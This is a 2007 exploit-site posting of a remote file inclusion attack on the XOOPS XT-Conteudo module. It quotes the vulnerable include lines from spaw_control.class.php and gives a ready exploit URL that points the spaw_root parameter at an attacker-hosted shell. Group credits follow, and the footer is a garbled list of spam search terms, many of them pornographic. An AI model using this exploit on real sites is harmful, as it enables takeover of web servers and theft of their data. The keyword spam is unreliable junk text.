about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability




2007-06-15 XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability 
Rated as " Moderate Risk

##############################################################################################
#         ___   ___                         _
#        / _  / _                        | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ / __| | '_  / _  __|
# | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#  __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title
###############################################################################
#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability
#
#Description
#################################################################################
#Content module for XOOPS CMS
#
#Vuln Code
###################################################################################
#In /admin/spaw/spaw_control.class.php
# include $spaw_root.'config/spaw_control.config.php';
# include $spaw_root.'class/toolbars.class.php';
# include $spaw_root.'class/lang.class.php';
#
#Script Download
##############################################################################
#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405
#
#Exploit
######################################################################################
#
#http://[ site
]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell
]?
#
#Credits
######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################

securitydot.net - 2007-06-15

Advertising

Copyright 2007, SecurityDot
Fri, 20 Nov 2009 22:23:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
primecups mambo+Remo dog sled sexzero.in Rani mukha Fifa 2006 alohfrmca video song Sexfoot t337t trisha bat Indian del Free naked HARDSEX local 2.6 sri lankan Rcssports. ModernBill shweta tiw Www4sex.co openwall www.jnclj. anjelina j Mujes haci seam kings WWW.WOMENS nudegirl.c www.2008sf www.sexboy Gils Sekol news for c php-nuke+2 Remote+Dek Woltlab Bu vas vie XXXSEXY.CO trisha bat board expl www.jyly99 forever100 www.segou1 news for c Searching Bugil Dewi wwwsexocea India actr sex pic astaro ULN